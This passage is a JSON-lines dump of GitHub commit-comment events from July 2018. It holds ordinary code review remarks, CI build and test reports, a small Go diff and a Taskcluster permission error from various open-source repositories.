test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T13:45:21Z"}
{"id":"8044180691","type":"CommitCommentEvent","actor":{"login":"Zealouszeal"},"repo":{"name":"Zealouszeal/Hello-World"},"payload":{"comment":{"id":29904510,"position":null,"line":null,"path":null,"commit_id":"9575dfc2a4b47673d8defbb2c5704f60e00200d9","created_at":"2018-07-31T13:45:31Z","updated_at":"2018-07-31T13:45:31Z","author_association":"OWNER","body":"{\r\n  \"name\": \"savjeecoin\",\r\n  \"version\": \"1.0.0\",\r\n  \"description\": \"\",\r\n  \"main\": \"main.js\",\r\n  \"scripts\": {\r\n    \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\"\r\n  },\r\n  \"author\": \"\",\r\n  \"license\": \"ISC\",\r\n  \"dependencies\": {\r\n    \"crypto-js\": \"^3.1.9-1\"\r\n  }\r\n}"}},"created_at":"2018-07-31T13:45:31Z"}
{"id":"8044194897","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29904554,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T13:47:50Z","updated_at":"2018-07-31T13:47:50Z","author_association":"OWNER","body":"https://photos.app.goo.gl/jmXVkcofTBuQptCz5"}},"created_at":"2018-07-31T13:47:50Z"}
{"id":"8044201347","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29904566,"position":null,"line":null,"path":null,"commit_id":"fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282","created_at":"2018-07-31T13:48:48Z","updated_at":"2018-07-31T13:48:48Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T13:48:48Z"}
{"id":"8044202255","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"iikira/BaiduPCS-Go"},"payload":{"comment":{"id":29904571,"position":null,"line":null,"path":null,"commit_id":"de3a91fcc151f27b5f0d59d9f4471633b9e052d1","created_at":"2018-07-31T13:48:56Z","updated_at":"2018-07-31T13:48:56Z","author_association":"NONE","body":"我做了如下修改，不知道是不是正确。\r\n```diff\r\ndiff --git a/pcsliner/clear_windows.go b/pcsliner/clear_windows.go\r\nindex 28cfa46..b04a09f 100644\r\n--- a/pcsliner/clear_windows.go\r\n+++ b/pcsliner/clear_windows.go\r\n@@ -22,5 +22,5 @@ func ClearScreen() {\r\n        if defaultLinerState == nil {\r\n                defaultLinerState = liner.NewLiner()\r\n        }\r\n-       defaultLinerState.ClearScreen()\r\n+       eraseScreen(defaultLinerState)\r\n }\r\n\r\n\r\n```"}},"created_at":"2018-07-31T13:48:56Z"}
{"id":"8044205171","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29904575,"position":null,"line":null,"path":null,"commit_id":"fd52a648bccd162c042ffd4cab66dc34d870b592","created_at":"2018-07-31T13:49:24Z","updated_at":"2018-07-31T13:49:24Z","author_association":"OWNER","body":"Add undo tab"}},"created_at":"2018-07-31T13:49:24Z"}
{"id":"8044214272","type":"CommitCommentEvent","actor":{"login":"johndpope"},"repo":{"name":"taglia3/CircularSpinner"},"payload":{"comment":{"id":29904598,"position":43,"line":230,"path":"CircularSpinner/Classes/CircularSpinner.swift","commit_id":"0b1b602f7ec4017dbdf6be1dc53fd01e5f51fcde","created_at":"2018-07-31T13:50:47Z","updated_at":"2018-07-31T13:50:47Z","author_association":"NONE","body":"need to expose more of   @objc these for those old folks still tinkering with legacy apps. \r\n"}},"created_at":"2018-07-31T13:50:47Z"}
{"id":"8044214339","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29904599,"position":21,"line":29,"path":"api/src/main/java/org/openmrs/module/msfcore/api/MSFCoreService.java","commit_id":"524e47f76ac94b994c5863f0efc3b1f7879c7a5f","created_at":"2018-07-31T13:50:48Z","updated_at":"2018-07-31T13:50:48Z","author_association":"NONE","body":"@kaweesi Please add these in a separate AuditService"}},"created_at":"2018-07-31T13:50:48Z"}
{"id":"8044217755","type":"CommitCommentEvent","actor":{"login":"stnava"},"repo":{"name":"ANTsX/ANTs"},"payload":{"comment":{"id":29904612,"position":null,"line":null,"path":null,"commit_id":"b872ef3bd154998377c100fa75788140fc491a39","created_at":"2018-07-31T13:51:19Z","updated_at":"2018-07-31T13:51:19Z","author_association":"MEMBER","body":"yes nick and i discussed it.   we are happy with that change and are hoping\nit has minimal to positive impact on registration accuracy.\n\nbrian\n\n\n\nOn Tue, Jul 31, 2018 at 9:30 AM Gabriel A. Devenyi <notifications@github.com>\nwrote:\n\n> Sorry @cookpa <https://github.com/cookpa>, this is the discussion re: MI\n> bins that was merged: http://review.source.kitware.com/#/c/23580/\n>\n> I was wondering if @stnava <https://github.com/stnava> had seen the\n> discussion regarding smoothing since that will update the\n> registrationmethod and require another git tag change.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ANTsX/ANTs/commit/b872ef3bd154998377c100fa75788140fc491a39#commitcomment-29904232>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AATyfp0j69KimH-fBIcYpWVPqI2oNjQDks5uMFvxgaJpZM4VnC2L>\n> .\n>\n"}},"created_at":"2018-07-31T13:51:19Z"}
{"id":"8044223946","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29904630,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-31T13:52:16Z","updated_at":"2018-07-31T13:52:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T13:52:16Z"}
{"id":"8044231511","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29904646,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-31T13:53:27Z","updated_at":"2018-07-31T13:53:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T13:53:27Z"}
{"id":"8044243219","type":"CommitCommentEvent","actor":{"login":"ohartenstein23"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29904682,"position":null,"line":null,"path":null,"commit_id":"3f0ca186e81bca7f8abb989d12245cdc2b767dac","created_at":"2018-07-31T13:55:19Z","updated_at":"2018-07-31T13:55:19Z","author_association":"OWNER","body":"The ruleset parameter is\r\n```\r\npediaReplaceCraftFuelWithRangeType: -1 # Default -1, 0 = max theoretical range, 1 = min and max theoretical range, 2 = average of min and max theoretical range. Otherwise, show fuel capacity\r\n```\r\n\r\nThe strings are:\r\n```\r\n  STR_MAXIMUM_RANGE: \"MAX RANGE>{ALT}{0}{ALT}\" # Shown for max and average ranges\r\n  STR_MINIMUM_RANGE: \"MIN RANGE>{ALT}{0}{ALT}\" # Shown only for min range\r\n  STR_INFINITE_RANGE: \"N/A\" # Shown when a craft doesn't have a fuel item and is slower than 100\r\n```\r\nFor type 0 and 2, the range is rounded to the nearest 10 nautical miles for ranges under 1000, to the nearest 100 for ranges over 1000."}},"created_at":"2018-07-31T13:55:19Z"}
{"id":"8044243272","type":"CommitCommentEvent","actor":{"login":"smitsohu"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29904683,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T13:55:20Z","updated_at":"2018-07-31T13:55:20Z","author_association":"COLLABORATOR","body":"There is a diagnostic macro `EUID_PRINT()`, does the function really leave with euid 0?"}},"created_at":"2018-07-31T13:55:20Z"}
{"id":"8044247278","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29904690,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T13:55:56Z","updated_at":"2018-07-31T13:55:56Z","author_association":"CONTRIBUTOR","body":"@pr2git in OpenViX enigma2 the .po fills are updated by the build. So the .po files in the build/feeds should be right up to date. With that in mind, what extra benefits can we get from using this script?"}},"created_at":"2018-07-31T13:55:56Z"}
{"id":"8044254944","type":"CommitCommentEvent","actor":{"login":"nyov"},"repo":{"name":"xattr/xattr"},"payload":{"comment":{"id":29904713,"position":null,"line":null,"path":null,"commit_id":"ffeccb067de52fa6296d9063dec5897a2a79ecea","created_at":"2018-07-31T13:57:07Z","updated_at":"2018-07-31T13:57:07Z","author_association":"MEMBER","body":"Good catch"}},"created_at":"2018-07-31T13:57:07Z"}
{"id":"8044258066","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29904728,"position":25,"line":38,"path":"api/src/main/java/org/openmrs/module/msfcore/api/dao/MSFCoreDao.java","commit_id":"524e47f76ac94b994c5863f0efc3b1f7879c7a5f","created_at":"2018-07-31T13:57:35Z","updated_at":"2018-07-31T13:57:35Z","author_association":"NONE","body":"@kaweesi Please move this methods to AuditDAO"}},"created_at":"2018-07-31T13:57:35Z"}
{"id":"8044261181","type":"CommitCommentEvent","actor":{"login":"wuxiumu"},"repo":{"name":"wuxiumu/It-Boy-51qbsc-Php"},"payload":{"comment":{"id":29904741,"position":null,"line":null,"path":null,"commit_id":"2d4132905a4ed260c05ac8259f278d0511116dc7","created_at":"2018-07-31T13:58:06Z","updated_at":"2018-07-31T13:58:06Z","author_association":"OWNER","body":"第二次怎么写"}},"created_at":"2018-07-31T13:58:06Z"}
{"id":"8044268043","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/DAISIE"},"payload":{"comment":{"id":29904756,"position":null,"line":null,"path":null,"commit_id":"b02aa74149c2acf1405c745b6f7230b7483fc2bc","created_at":"2018-07-31T13:59:09Z","updated_at":"2018-07-31T13:59:09Z","author_association":"OWNER","body":"@Neves-P : I (any many others) recommend to use ggplot2 over custom plotting functions. \r\n\r\nI see you switch to `plot` due to this error:\r\n\r\n```\r\nDAISIE_plot_area: no visible binding for global variable ‘Time’\r\n```\r\n\r\nSolution is, to write before that line:\r\n\r\n```\r\n  Time <- NULL; rm(Time) # nolint, fixes warning: no visible binding for global variable\r\n``` \r\n\r\nYes, that may look clumsy. It is a workaround for a hard problem that plagues R developers for a long time. That is why this is an accepted idiom.\r\n\r\nEnjoy!"}},"created_at":"2018-07-31T13:59:09Z"}
{"id":"8044270641","type":"CommitCommentEvent","actor":{"login":"joe704la"},"repo":{"name":"aspnetboilerplate/aspnetboilerplate"},"payload":{"comment":{"id":29904771,"position":null,"line":null,"path":null,"commit_id":"59237945c7b75cedcaf8be5467de78b5116ae75a","created_at":"2018-07-31T13:59:33Z","updated_at":"2018-07-31T13:59:33Z","author_association":"NONE","body":"@ismcagdas where can I find this in the documentation? I tried looking for it on https://aspnetboilerplate.com/ but did not find it. "}},"created_at":"2018-07-31T13:59:33Z"}
{"id":"8044271686","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29904775,"position":5,"line":30,"path":"pkgs/development/coq-modules/category-theory/default.nix","commit_id":"08bf0b7630afa8656bb36bd61fac8ce9b2aff613","created_at":"2018-07-31T13:59:42Z","updated_at":"2018-07-31T13:59:42Z","author_association":"CONTRIBUTOR","body":"Ah, I understand now: I have a local overlay that provides the right version of equations. I'll need to do my change testing in a NixOS VM that ensures it will build using only the contents of nixpkgs."}},"created_at":"2018-07-31T13:59:42Z"}
{"id":"8044280532","type":"CommitCommentEvent","actor":{"login":"adamsilver"},"repo":{"name":"hmcts/frontend"},"payload":{"comment":{"id":29904801,"position":9,"line":9,"path":"app/views/components/progress-bar/index.html","commit_id":"1cfd876cfc325720dd9cc0a4774c1f5d9bf86ca2","created_at":"2018-07-31T14:00:58Z","updated_at":"2018-07-31T14:00:58Z","author_association":"COLLABORATOR","body":"Might want this to become `{ label: { text/html: ' ' } }`\r\n"}},"created_at":"2018-07-31T14:00:58Z"}
{"id":"8044283795","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29904808,"position":11,"line":37,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"119028715dcaab7b77c0f78bf443074e3186e350","created_at":"2018-07-31T14:01:28Z","updated_at":"2018-07-31T14:01:28Z","author_association":"COLLABORATOR","body":"`@input=\"sortContacts\" />`"}},"created_at":"2018-07-31T14:01:28Z"}
{"id":"8044285440","type":"CommitCommentEvent","actor":{"login":"iikira"},"repo":{"name":"iikira/BaiduPCS-Go"},"payload":{"comment":{"id":29904812,"position":null,"line":null,"path":null,"commit_id":"de3a91fcc151f27b5f0d59d9f4471633b9e052d1","created_at":"2018-07-31T14:01:43Z","updated_at":"2018-07-31T14:01:43Z","author_association":"OWNER","body":"应该修复了"}},"created_at":"2018-07-31T14:01:43Z"}
{"id":"8044292398","type":"CommitCommentEvent","actor":{"login":"newtoncr"},"repo":{"name":"newtoncr/enterprise"},"payload":{"comment":{"id":29904825,"position":null,"line":null,"path":null,"commit_id":"7f2962622ba3df153680fa86eef77ea209f94919","created_at":"2018-07-31T14:02:48Z","updated_at":"2018-07-31T14:02:48Z","author_association":"OWNER","body":"runbot fix"}},"created_at":"2018-07-31T14:02:48Z"}
{"id":"8044292617","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29904826,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-31T14:02:50Z","updated_at":"2018-07-31T14:02:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T14:02:50Z"}
{"id":"8044293873","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29904830,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-31T14:03:02Z","updated_at":"2018-07-31T14:03:02Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-MacOS-10.9-clang: Tests Failed (2361 of 2928 tests passed, 56 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 563 tests had: Table big diffs.\n * 173 tests had: ESO small diffs.\n * 2 tests had: BND diffs.\n * 84 tests had: ESO big diffs.\n * 91 tests had: AUD diffs.\n * 40 tests had: MTR big diffs.\n * 102 tests had: MTR small diffs.\n * 21 tests had: ERR diffs.\n * 3 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: RDD diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 58\n * Failed: 567\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.64%25-red.png)</a> \n"}},"created_at":"2018-07-31T14:03:02Z"}
{"id":"8044294187","type":"CommitCommentEvent","actor":{"login":"suikabreaker"},"repo":{"name":"Loong-Language/loong-clang"},"payload":{"comment":{"id":29904831,"position":6,"line":86,"path":"include/clang/Basic/Specifiers.h","commit_id":"6f905b7a4a402ca8a8e4ab4928ac19b74127f317","created_at":"2018-07-31T14:03:06Z","updated_at":"2018-07-31T14:03:06Z","author_association":"NONE","body":"你把自己的enum加到error后面？"}},"created_at":"2018-07-31T14:03:06Z"}
{"id":"8044297543","type":"CommitCommentEvent","actor":{"login":"RabsRincon"},"repo":{"name":"mattgodbolt/compiler-explorer"},"payload":{"comment":{"id":29904838,"position":5,"line":69,"path":"Makefile","commit_id":"623f6691331dc2665de7d8a7455d2a698afd999d","created_at":"2018-07-31T14:03:35Z","updated_at":"2018-07-31T14:03:35Z","author_association":"COLLABORATOR","body":"Did this slip thru when staging or is it deliberate?"}},"created_at":"2018-07-31T14:03:35Z"}
{"id":"8044299843","type":"CommitCommentEvent","actor":{"login":"otavio"},"repo":{"name":"Freescale/kernel-module-imx-gpu-viv"},"payload":{"comment":{"id":29904841,"position":null,"line":null,"path":null,"commit_id":"6dd64fcbfc5ef0a82388dbffaf96150ad6d8c226","created_at":"2018-07-31T14:03:57Z","updated_at":"2018-07-31T14:03:57Z","author_association":"MEMBER","body":"Perfect, so please add this to the commit log"}},"created_at":"2018-07-31T14:03:57Z"}
{"id":"8044303878","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"marco-c/mozilla-releng-services"},"payload":{"comment":{"id":29904852,"position":null,"line":null,"path":null,"commit_id":"9bab5c39f8c0e7098117769090197375859692d6","created_at":"2018-07-31T14:04:34Z","updated_at":"2018-07-31T14:04:34Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1533045874152\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.9bab5c39f8c0e7098117769090197375859692d6\",\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/marco-c/mozilla-releng-services:branch:master\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1533045874152\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.9bab5c39f8c0e7098117769090197375859692d6\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-31T14:04:34.187Z\n\n</details>"}},"created_at":"2018-07-31T14:04:34Z"}
{"id":"8044313271","type":"CommitCommentEvent","actor":{"login":"gianpaj"},"repo":{"name":"GeekyAnts/NativeBase"},"payload":{"comment":{"id":29904872,"position":null,"line":null,"path":null,"commit_id":"76458d7457668f9d8cf0e04df19b12e85b90ce02","created_at":"2018-07-31T14:05:55Z","updated_at":"2018-07-31T14:05:55Z","author_association":"NONE","body":"I see there is no longer an npm script to run the tests with jest.\r\n\r\nAre tests in the `__tests__` folder not valid or should be ignored?\r\n\r\nFor example, if I run this I non of the tests run:\r\n```\r\n$ npx jest __tests__/basic/Header.android.js\r\n FAIL  __tests__/basic/Header.android.js\r\n  ● Test suite failed to run\r\n\r\n    Cannot find module 'setupDevtools' from 'setup.js'\r\n\r\n      at Resolver.resolveModule (node_modules/jest-resolve/build/index.js:221:17)\r\n      at Object.<anonymous> (node_modules/react-native/jest/setup.js:5:6)\r\n\r\n FAIL  dist/__tests__/basic/Header.android.js\r\n  ● Test suite failed to run\r\n\r\n    Cannot find module 'setupDevtools' from 'setup.js'\r\n\r\n      at Resolver.resolveModule (node_modules/jest-resolve/build/index.js:221:17)\r\n      at Object.<anonymous> (node_modules/react-native/jest/setup.js:5:6)\r\n\r\nTest Suites: 2 failed, 2 total\r\nTests:       0 total\r\nSnapshots:   0 total\r\nTime:        0.478s\r\nRan all test suites matching /__tests__\\/basic\\/Header.android.js/i.\r\n```"}},"created_at":"2018-07-31T14:05:55Z"}
{"id":"8044316266","type":"CommitCommentEvent","actor":{"login":"freed00m"},"repo":{"name":"LukeSmithxyz/voidrice"},"payload":{"comment":{"id":29904878,"position":null,"line":null,"path":null,"commit_id":"112244afc8e70a96bb034d6077a13d0cb621cdd7","created_at":"2018-07-31T14:06:23Z","updated_at":"2018-07-31T14:06:23Z","author_association":"CONTRIBUTOR","body":"Wow, it really freaks my head using it. :+1:  \r\nBut I will try to get used to it, it makes much more sense."}},"created_at":"2018-07-31T14:06:23Z"}
{"id":"8044323858","type":"CommitCommentEvent","actor":{"login":"jskeet"},"repo":{"name":"googleapis/gax-dotnet"},"payload":{"comment":{"id":29904901,"position":5,"line":15,"path":"src/Google.Api.CommonProtos/Type/MoneyPartial.cs","commit_id":"c4d6ac9d21121c6fb2b6f06141b4fe60bbebd62d","created_at":"2018-07-31T14:07:33Z","updated_at":"2018-07-31T14:07:33Z","author_association":"COLLABORATOR","body":"Typo: abastraction => abstraction. (I can fix it later if you'd prefer.) Otherwise, feel free to commit --amend and force push."}},"created_at":"2018-07-31T14:07:33Z"}
{"id":"8044325643","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29904904,"position":5,"line":4,"path":"srcpkgs/etr/template","commit_id":"eb6f4f25bcf8e61d5ac49a05e8601494fb2217ab","created_at":"2018-07-31T14:07:50Z","updated_at":"2018-07-31T14:07:50Z","author_association":"MEMBER","body":"etr was revbumped after your PR and I incremented one too much after fixing the merge.. no problem, though."}},"created_at":"2018-07-31T14:07:50Z"}
{"id":"8044325842","type":"CommitCommentEvent","actor":{"login":"Github527"},"repo":{"name":"Github527/shiva"},"payload":{"comment":{"id":29904905,"position":null,"line":null,"path":null,"commit_id":"11e5725df1446c22604b5c5bf06330cc215694ee","created_at":"2018-07-31T14:07:52Z","updated_at":"2018-07-31T14:07:52Z","author_association":"OWNER","body":"\"comit\""}},"created_at":"2018-07-31T14:07:52Z"}
{"id":"8044326146","type":"CommitCommentEvent","actor":{"login":"serencorbett1"},"repo":{"name":"serencorbett1/xenadmin"},"payload":{"comment":{"id":29904906,"position":null,"line":null,"path":null,"commit_id":"2da341a5df77aa49966b38fca6d64b3ef4949783","created_at":"2018-07-31T14:07:55Z","updated_at":"2018-07-31T14:07:55Z","author_association":"OWNER","body":"Tested and code is working @MihaelaStoica."}},"created_at":"2018-07-31T14:07:55Z"}
{"id":"8044329146","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29904916,"position":23,"line":46,"path":"compile.rkt","commit_id":"4ee13e1c44917af15f94746bead0fe1e168a5c76","created_at":"2018-07-31T14:08:21Z","updated_at":"2018-07-31T14:08:21Z","author_association":"OWNER","body":"That's not so bad :)"}},"created_at":"2018-07-31T14:08:21Z"}
{"id":"8044331075","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29904925,"position":42,"line":91,"path":"compile.rkt","commit_id":"4ee13e1c44917af15f94746bead0fe1e168a5c76","created_at":"2018-07-31T14:08:40Z","updated_at":"2018-07-31T14:08:40Z","author_association":"OWNER","body":"Why XXX?"}},"created_at":"2018-07-31T14:08:40Z"}
{"id":"8044332679","type":"CommitCommentEvent","actor":{"login":"mattgodbolt"},"repo":{"name":"mattgodbolt/compiler-explorer"},"payload":{"comment":{"id":29904930,"position":5,"line":69,"path":"Makefile","commit_id":"623f6691331dc2665de7d8a7455d2a698afd999d","created_at":"2018-07-31T14:08:55Z","updated_at":"2018-07-31T14:08:55Z","author_association":"OWNER","body":"oops yes: please kill it, I didn't mean to check it in. I was workin on my laptop and had no internet."}},"created_at":"2018-07-31T14:08:55Z"}
{"id":"8044332879","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29904931,"position":4,"line":27,"path":"compile.rkt","commit_id":"4ee13e1c44917af15f94746bead0fe1e168a5c76","created_at":"2018-07-31T14:08:57Z","updated_at":"2018-07-31T14:08:57Z","author_association":"OWNER","body":"Let's do `include-src!` "}},"created_at":"2018-07-31T14:08:57Z"}
{"id":"8044336754","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29904947,"position":11,"line":69,"path":"src/components/MainNav/MyProfile/MyProfile.js","commit_id":"a944624d843933ebf0a562153e24f5cdd788e23c","created_at":"2018-07-31T14:09:34Z","updated_at":"2018-07-31T14:09:34Z","author_association":"CONTRIBUTOR","body":"Haha, that's a pretty funny typo! :-)"}},"created_at":"2018-07-31T14:09:34Z"}
{"id":"8044337688","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29904953,"position":null,"line":null,"path":null,"commit_id":"5f1c5377469386c258c1f05b3a9a42d3c4076e79","created_at":"2018-07-31T14:09:43Z","updated_at":"2018-07-31T14:09:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] feat(Parámetros - Tipo Vehiculo): campo de categoría](https://trello.com/c/KhTgh3KO/28-incidentes-featpar%C3%A1metros-tipo-vehiculo-campo-de-categor%C3%ADa)"}},"created_at":"2018-07-31T14:09:43Z"}
